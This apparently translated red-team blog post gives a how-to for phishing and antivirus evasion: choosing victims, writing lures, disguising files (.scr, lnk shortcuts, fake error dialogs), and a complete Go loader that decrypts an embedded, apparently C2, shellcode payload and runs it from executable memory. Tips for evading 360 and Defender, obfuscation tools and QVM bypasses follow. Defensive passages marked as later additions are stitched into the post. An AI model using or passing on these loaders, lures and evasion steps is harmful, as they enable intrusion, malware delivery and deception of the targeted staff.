
Title: Phishing techniques and Trojan AV-evasion tips

Overview

Phishing is a common method in attack-defense exercises. The attacker poses as a trustworthy entity, such as a legitimate institution, a company or an individual, to lure the victim into revealing sensitive information or performing a malicious action. It can quickly open a breach in the target and get you onto the intranet to score points. When delivering a Trojan you also have to think about evading antivirus detection. This article covers common phishing methods and Trojan AV-evasion techniques.

Information Gathering

Bulk email address collection

https://app.snov.io/

http://www.skymem.info/

Search engines

Corporate mailboxes usually sit behind an email gateway, and delivery to them is easily blocked or bounced, so look for private mailboxes, or mailboxes that the mail server does not filter:

For example, the public-facing addresses that xx publishes for whistleblower reports or recruitment. Search syntax:

site:"xxx.com" report

site:"xxx.com" recruitment

xx company report @126.com

xx company recruitment @qq.com

image-20231103173433363

Phishing Techniques

Social engineering phishing

First, target selection. Preferred target groups: HR, managers, finance staff and other people with weak security awareness. Prepare several scenarios in advance so you can deal with whoever answers.

Pick a branch of the target company where the success rate is high. Think through your script and your responses ahead of time to avoid being discovered. Preferably stay away from headquarters, and avoid the IT and information-security departments.

Socially confident operators can try phishing by phone: gain trust first, then add the target on WeChat and send the Trojan there (this takes exceptional nerve and adaptability; I learned a lot of it from Pan Gaogong).

Email phishing

Bulk mailing (not recommended: it is easily noticed by administrators or intercepted by the email gateway)

Collect the email addresses of key individuals and deliver to them directly (recommended: far stealthier)

Welfare subsidy notices

Ride current events and use all kinds of welfare or subsidy activities to lure target users into clicking; convert the phishing link into a QR code before sending it.

image-20231104103425528

image-20230922182918302

Resume submission

Submit a resume in reply to a job posting. HR staff facing a large volume of resumes will not check the file extension carefully.

image-20231104105527137

Can't write phishing copy? No problem: if it can be generated automatically, don't write it by hand. Hand our ChatGPT brother a chicken leg and let it do the work.

image-20231103155359779

Whistleblower letter

A real-name report or complaint addressed to xxx: this kind of email is generally handled and answered quickly.

raun4acoooe18680.png

Phishing File Disguise

General tips

Compress the Trojan with a password and hidden contents, or double-compress it, to get past email-gateway detection to some extent.

Choose uncommon extensions that Windows still runs as an executable, such as .scr and .com.

Use a long file name: when the name is displayed incorrectly (truncated), the extension is not visible in the preview.
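The three disguises above are exactly what the receiving side, a mail gateway or a reviewer, can test for. As an added example (not code from the original post), here is a small Go checker that flags them: a directly executable extension, a document extension sitting in front of the real one, an overly long name, and, going one step beyond the post, the right-to-left override character that makes "fdp.exe" render as "exe.pdf". The extension lists and the length threshold are my assumptions, and the sample names are constructed, not taken from any real campaign.

```go
package main

import (
	"fmt"
	"path/filepath"
	"strings"
)

// Extensions Windows runs directly even though recipients rarely expect them
// in an attachment. Assumed list for this example; extend to taste.
var execExt = map[string]bool{
	".exe": true, ".scr": true, ".com": true, ".pif": true, ".bat": true,
	".cmd": true, ".vbs": true, ".js": true, ".lnk": true, ".hta": true,
}

// Document extensions commonly used as the visible "fake" part of a name.
var docExt = map[string]bool{
	".doc": true, ".docx": true, ".pdf": true, ".xls": true, ".xlsx": true,
	".txt": true, ".jpg": true, ".png": true,
}

// longNameThreshold is an assumed cut-off: names longer than this are often
// truncated by mail clients and previews, which hides the real extension.
const longNameThreshold = 80

// CheckAttachmentName returns the reasons a filename looks like a disguised
// executable. An empty result means nothing suspicious was found.
func CheckAttachmentName(name string) []string {
	var reasons []string
	lower := strings.ToLower(name)
	ext := filepath.Ext(lower)

	if execExt[ext] {
		reasons = append(reasons, "executable extension "+ext)
	}
	// "report.pdf.exe": the extension before the real one is a document type.
	inner := filepath.Ext(strings.TrimSuffix(lower, ext))
	if execExt[ext] && docExt[inner] {
		reasons = append(reasons, "double extension "+inner+ext)
	}
	if len([]rune(name)) > longNameThreshold {
		reasons = append(reasons, "overly long name hides the extension in previews")
	}
	// U+202E (right-to-left override) reverses the display order of the
	// characters after it, so "invoice\u202Efdp.exe" renders as "invoiceexe.pdf".
	if strings.ContainsRune(name, '\u202E') {
		reasons = append(reasons, "right-to-left override character")
	}
	// A run of spaces before the extension is another way to push it out of view.
	if strings.Contains(name, "     ") {
		reasons = append(reasons, "long run of spaces before the extension")
	}
	return reasons
}

func main() {
	// Constructed sample names.
	samples := []string{
		"resume.docx",
		"resume.pdf.exe",
		"salary_subsidy_form.scr",
		strings.Repeat("x", 90) + ".doc.com",
		"complaint\u202Efdp.exe",
	}
	for _, s := range samples {
		fmt.Printf("%q -> %v\n", s, CheckAttachmentName(s))
	}
}
```

Run it on your own attachment log: anything that returns more than one reason is almost always a lure rather than a user mistake.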

lnk phishing

If you know the target organisation is not running 360 Tianqing, you can phish with an lnk file (360 intercepts it).

Fill in the shortcut's target field:

%windir%\system32\cmd.exe /c start .\.__MACOS__\.__MACOS__\.__MACOS__\.__MACOS__\.__MACOS1__\xxx.doc && C:\Windows\explorer.exe ".\.__MACOS__\.__MACOS__\.__MACOS1__\fsx.exe"

img

Icon file choices (paths to browse for a convincing icon):

C:\Program Files (x86)\Microsoft\Edge\Application

%SystemRoot%\System32\imageres.dll

%SystemRoot%\System32\shell32.dll

image.png

Fake error message box

Show a message box with misleading text such as "File is corrupted".

VBS implementation

On Error Resume Next

WScript.Sleep 2000

MsgBox "The current file is corrupted, please open it with another tool", 64, "Tip"

Go implementation

package main

import (
	"github.com/gen2brain/dlgs"
)

// box shows an information dialog that looks like a file-corruption error.
func box() {
	_, err := dlgs.Info("Tip", "The current file is corrupted, please open it with another tool")
	if err != nil {
		panic(err)
	}
}

func main() {
	box()
}

Result

image-20231103170505169

File bundler

Bundle a normal file with the malicious Trojan. When run, the exe deletes itself, then drops the normal file into the current directory and opens it, and drops the Trojan into C:\Users\Public\Videos and runs it.

Version 1.1: bypasses common AVs (360, Defender, "turtle", etc.)

Version 1.2: dropped files are hidden automatically

image-20231103113848878

Result

image-20231104115308737

Common AV products

AV product | Characteristics

Turquoise | Many restrictions on compiler flags; recognises hash and string signatures. Anything that passes the static scan and then executes dynamically is basically not detected. Calling certain Go libraries triggers an alert.

360 | 360 Safeguard alone has a low detection rate; once 360 Antivirus is installed as well the tables are turned and detection improves greatly. The antivirus uploads samples automatically, so the sample is easily detected once it has been in the cloud for a while. Separating loader and payload and adding anti-sandbox code is recommended to extend the implant's lifetime.

360 Core Crystal | Turning it on has no great effect on overall detection. Avoid loading shellcode through process injection; for command execution use BOF plugins instead.

Defender | Cobalt Strike rules have been added; Stageless is recommended over Staged. Enabling the sleep_mask option in 4.5 improves evasion; the detection rate for large files is low.

Basic loading method

The following is only a basic example; it implements nothing more than encryption, decryption and loading.

First, XOR-encrypt the raw shellcode from payload.c with a Python script and base64-encode it:

import base64

# Raw shellcode bytes (only the first bytes of the payload.c array are shown here)
originalShellcode = b'\xfc\xe8\x89\x00'

# XOR every byte with the key; the loader must XOR with the same key to decrypt
encryptedShellcode = bytes([byte ^ 0x77 for byte in originalShellcode])

# Base64-encode so the result can be pasted into the Go source as a string
encodedShellcode = base64.b64encode(encryptedShellcode).decode('utf-8')
print(encodedShellcode)

image-20231104111224020

Paste the output into encryptedShellcode and compile:

package main

import (
	"encoding/base64"
	"syscall"
	"unsafe"

	"github.com/lxn/win"
	"golang.org/x/sys/windows"
)

func main() {
	// Hide the console window
	win.ShowWindow(win.GetConsoleWindow(), win.SW_HIDE)

	// Shellcode as produced by the Python script: XOR-encrypted, then base64-encoded
	encryptedShellcode := "iz/0k4efv3d3dzYmNiclJiE/RqUSP/wlFz/8JW8//CVXP/wFJz94wD09Oka+P0a320sWC3VbVza2vno2draVmiU2Jj/8JVf8NUs/dqcR9g9vfHUCBfz3/3d3dz/ytwMQP3anJ/w/bzP8N1c+dqeUIT+Ivjb8Q/8/dqE6Rr4/RrfbNra+ejZ2tk+XAoY7dDtTfzJOpgKvLzP8N1M+dqcRNvx7PzP8N2s+dqc2/HP/P3anNi82LykuLTYvNi42LT/0m1c2JYiXLzYuLT/8ZZ44iIiIKh13PskAHhkeGRIDdzYhPv6RO/6GNs07AFFwiKI/Rr4/RqU6Rrc6Rr42JzYnNs1NIQ7QiKKe5Hd3dy0//rY2z8x2d3c6Rr42JjYmHXQ2JjbNIP7osYiinA4sP/62P0alPv6vOka+JR93RbfzJSU2zZwiWUyIoj/+sT/0tCcdfSg//obNaHd3dx13H/dEd3c+/pc2znN3d3c2zQIx6fGIoj/+hj/+rT6wt4iIiIg6Rr4lJTbNWnFvDIii8rd48up2d3c/iLh48/t2d3ecxJ6Tdnd3n/WIiIhYBAMWAx4UWB0EWB0GAhIFDlpEWURZRVkEGx4aWRoeGVkdBHdhI6t+16t+1fOvaU170U01iyzbpfayy1/2ar3+Ctaxwg13pLfzUvyPdjEAdyIEEgVaNhASGQNNVzoYDR4bGxZYQllHV18gHhkTGAAETFciTFcgHhkTGAAEVzkjV0JZRkxXEhlaIiRMVwUBTUZZQFlCXlcwEhQcGFhFR0dDRkZHQFcxHgUSERgPWEZZR1dfFg9een138a3Jhf8SuTLptsakGlHpCzEfaWu1GBbwmbCC5spmVmyh80fqMODP2ALXgmypFSNWG7SVeI0OybyhAGGyF4I4kOtTOz1MqEL3Bv8empA2KC6kL9eYO3xP4ukic3tfP++yRqP8gYDC1Aq3kBknsTnkPu3RSJoVXLtaD3jO3ibMl+cBpDBioUbhePdlxTvlhD+OZ/NDXSwjf1y7hgK70678/6sPEZl2VdgAUuFa17KFDBoUq6Cq9OLDOu5GFZp42AYcsmoQmwd8Xnc2yYfC1SGIoj9Gvs13dzd3Ns93Z3d3Ns43d3d3Ns0v0ySSiKI/5CQkP/6QP/6GP/6tNs93V3d3Pv6ONs1l4f6ViKI/9LNX8rcDwRH8cD92tPK3AqAvLy8/cnd3d3cntJ8IioiIBBIFAR4UEloSAxMVQEMZEVpGREdAQEdHT0ZPWQQfWRYHHhAAWQMSGRQSGQMUBFkUGBp3coKWdw=="

	// Decrypt: base64-decode, then XOR every byte with the same key the script used
	decodedShellcode, err := base64.StdEncoding.DecodeString(encryptedShellcode)
	if err != nil {
		panic(err)
	}
	for i := 0; i < len(decodedShellcode); i++ {
		decodedShellcode[i] ^= 0x77
	}

	// Resolve VirtualAlloc from kernel32.dll
	kernel32, _ := syscall.LoadDLL("kernel32.dll")
	VirtualAlloc, _ := kernel32.FindProc("VirtualAlloc")

	// Allocate RWX memory and copy the shellcode into it
	allocSize := uintptr(len(decodedShellcode))
	mem, _, _ := VirtualAlloc.Call(uintptr(0), allocSize, windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_EXECUTE_READWRITE)
	if mem == 0 {
		panic("VirtualAlloc failed")
	}
	buffer := (*[0x1_000_000]byte)(unsafe.Pointer(mem))[:allocSize:allocSize]
	copy(buffer, decodedShellcode)

	// Execute the shellcode by calling the allocated address as if it were a function
	syscall.Syscall(mem, 0, 0, 0, 0)
}
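The two halves of this scheme are a contract: whatever key the encoding script XORs with, the loader must XOR with the same key, and XOR gives you no error when they disagree, only garbage bytes. To make that explicit, here is the whole round trip in one Go program, added here and not part of the original post: Encode does what the Python script does, Decode does what the loader does before VirtualAlloc, both over a constructed stand-in for shellcode (not a working payload), and LongestRun shows a caveat the post does not mention: with a single-byte key, the zero padding typical of shellcode turns into a run of the key byte, which is itself a static signature, while a multi-byte key (my generalisation beyond the post's single byte) breaks the run. Nothing is allocated or executed.

```go
package main

import (
	"bytes"
	"encoding/base64"
	"errors"
	"fmt"
)

// xorWithKey XORs data with a repeating key. The same function encrypts and
// decrypts, which is why encoder and loader must agree on the key.
func xorWithKey(data, key []byte) []byte {
	out := make([]byte, len(data))
	for i, b := range data {
		out[i] = b ^ key[i%len(key)]
	}
	return out
}

// Encode is the "Python side": raw shellcode in, printable base64 blob out.
// An empty key is refused rather than silently producing plaintext.
func Encode(shellcode, key []byte) string {
	if len(key) == 0 {
		return ""
	}
	return base64.StdEncoding.EncodeToString(xorWithKey(shellcode, key))
}

// Decode is the "loader side": blob and key in, raw bytes out. Only the
// base64 step can fail; a wrong key returns garbage with no error.
func Decode(blob string, key []byte) ([]byte, error) {
	if len(key) == 0 {
		return nil, errors.New("empty key")
	}
	raw, err := base64.StdEncoding.DecodeString(blob)
	if err != nil {
		return nil, fmt.Errorf("blob is not valid base64: %w", err)
	}
	return xorWithKey(raw, key), nil
}

// LongestRun returns the length of the longest run of one repeated byte.
// A long run in the ciphertext is the tell-tale of a single-byte key applied
// over zero padding.
func LongestRun(b []byte) int {
	best, cur := 0, 0
	for i := range b {
		if i > 0 && b[i] == b[i-1] {
			cur++
		} else {
			cur = 1
		}
		if cur > best {
			best = cur
		}
	}
	return best
}

func main() {
	// Constructed stand-in: a few prologue-like bytes followed by zero padding.
	sample := append([]byte{0xfc, 0xe8, 0x89}, make([]byte, 16)...)

	single := []byte{0x77}
	multi := []byte{0x13, 0x37, 0x42, 0x99}

	blob := Encode(sample, single)
	back, _ := Decode(blob, single)
	fmt.Println("round trip with matching key:", bytes.Equal(back, sample))

	wrong, _ := Decode(blob, []byte{0xff})
	fmt.Println("round trip with mismatched key:", bytes.Equal(wrong, sample))

	rawSingle, _ := base64.StdEncoding.DecodeString(blob)
	rawMulti, _ := base64.StdEncoding.DecodeString(Encode(sample, multi))
	fmt.Println("longest byte run, single-byte key:", LongestRun(rawSingle))
	fmt.Println("longest byte run, multi-byte key:", LongestRun(rawMulti))
}
```

Because a mismatched key fails silently, a cheap sanity check in a loader is to compare the first decoded bytes against the stager prologue you expect before jumping into them; a loader that executes garbage crashes in a way that is very visible in EDR telemetry.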

General evasion tips

Remote loading, or separated loading (loader and payload in different files), is preferred, but each has drawbacks: the former can be traced or blocked by security devices, and the latter needs two files, which makes it better suited to maintaining persistence than to initial access.

Junk-code padding: perform harmless operations before loading the shellcode to confuse sandbox and AV verdicts, or evade detection through delayed execution or by inflating the size of the program.

Write the loader in a niche language so that it does not carry well-known loader signatures. Besides CS, vshell and other self-written C2 frameworks are also an option.

One-click evasive payload generators

Shamelessly plugging a GitHub project here; ahem, if you think it is decent, give it a star.

LoaderFly, evasion master Wang Chao's work with modifications by "demon attack": https://github.com/wangfly-me/LoaderFly

Qianji (Thousand Machines), automatic generation of evasive red-team Trojans: https://github.com/Pizz33/Qianji

Effect of compiler flags

go:

-race: build with race detection

-ldflags "-s -w": strip the symbol table and DWARF debug information

-ldflags "-H windowsgui": hide the console window

garble (obfuscator):

-tiny: strip extra runtime information

-literals: obfuscate string literals

-seed=random: random obfuscation seed (base64-encoded)

For example, compiling the harmless code below with -literals still makes 360 flag it; without the flag there is no alert.

package main

func main() {
	// Two numbers to multiply
	num1 := 5
	num2 := 3
	result := 0

	// Multiply by repeated addition in a for loop
	for i := 0; i < num2; i++ {
		result += num1
	}
	_ = result // keep the compiler from rejecting the unused variable
}

image-20231103142821152

The -H windowsgui flag also has a big effect on evasion. If you need to hide the console window without it, use one of the following instead (under Win11 a console window still appears).

Option 1, with lxn/win:

package main

import "github.com/lxn/win"

func main() {
	// Hide the console window attached to this process
	win.ShowWindow(win.GetConsoleWindow(), win.SW_HIDE)
}

Option 2, detaching the console with FreeConsole:

package main

import "syscall"

func box() int {
	// Detach the process from its console so no window is shown
	FreeConsole := syscall.NewLazyDLL("kernel32.dll").NewProc("FreeConsole")
	FreeConsole.Call()
	return 0
}

func main() {
	box()
}

Static signature handling

Obfuscation

Go, older versions: https://github.com/boy-hack/go-strip

Go, newer versions: https://github.com/burrowers/garble

Mangle: string replacement

https://github.com/optiv/Mangle

Mangle.exe -I xxx.exe -M -O out.exe

Comparing the binary before and after Mangle, the characteristic strings of a Go build have been replaced with random characters: image-20231104111621701

Base64-encoded variables

Before:

cmd := exec.Command("rundll32.exe", "xxx")

After: key strings are stored base64-encoded and decoded at the point of use (needs the encoding/base64 and os/exec imports):

encodedCommand := "cnVuZGxsMzIuZXhl" // "rundll32.exe"

encodedArguments := "MTExTdGFydA=="

// Decode the base64-encoded command and arguments at run time
decodedCommand, _ := base64.StdEncoding.DecodeString(encodedCommand)

decodedArguments, _ := base64.StdEncoding.DecodeString(encodedArguments)

cmd := exec.Command(string(decodedCommand), string(decodedArguments))

QVM bypass

Add resources

1. Add a version-info resource (icon, product name, copyright and the like); the following projects do it in one click:

image-20231104111439772

https://github.com/Pizz33/360QVM_bypass

https://github.com/S9MF/my_script_tools/tree/main/360QVM_bypass-public

https://github.com/langsasec/Sign-Sacker

y2fi0uuhfhi18690.png

image-20230504161714715

Behavioural signatures

Running shellcode directly usually triggers a QVM alert straight away:

package main

import (
	"syscall"
	"unsafe"
)

var (
	kernel32      = syscall.MustLoadDLL("kernel32.dll")
	ntdll         = syscall.MustLoadDLL("ntdll.dll")
	VirtualAlloc  = kernel32.MustFindProc("VirtualAlloc")
	RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")
)

const (
	MEM_COMMIT             = 0x1000
	MEM_RESERVE            = 0x2000
	PAGE_EXECUTE_READWRITE = 0x40
)

// decryt holds the already-decrypted shellcode; the post does not show how it is filled in
var decryt []byte

func main() {
	// Allocate RWX memory for the shellcode
	addr, _, err := VirtualAlloc.Call(0, uintptr(len(decryt)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
	if err != nil && err.Error() != "The operation completed successfully." {
		syscall.Exit(0)
	}

	// Copy the shellcode into the allocation
	_, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&decryt[0])), uintptr(len(decryt)))
	if err != nil && err.Error() != "The operation completed successfully." {
		syscall.Exit(0)
	}

	// The original snippet ends here; executing addr, as in the basic loader above, would follow
}
